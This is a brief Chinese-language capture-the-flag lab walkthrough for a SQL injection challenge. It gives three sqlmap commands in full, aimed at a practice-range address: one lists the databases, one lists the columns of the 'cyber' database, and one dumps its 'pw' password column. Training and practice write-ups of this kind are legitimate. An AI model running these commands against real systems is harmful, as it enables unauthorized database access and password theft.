首先找到该关卡
启动靶场环境
访问靶场
构造一个id参数,尝试访问,无内容回显
使用sqlmap工具,先获取数据库,输入命令sqlmap -u http://61.147.171.105:58893/?id=1 --dbs
发现第一个即为所需数据库,接下来进行获取字段,输入命令sqlmap -u http://61.147.171.105:58893/?id=1 -D cyber --columns
发现pw字段应该存放的密码,使用命令sqlmap -u http://61.147.171.105:58893/?id=1 -D cyber -C pw --dump,获得到密码
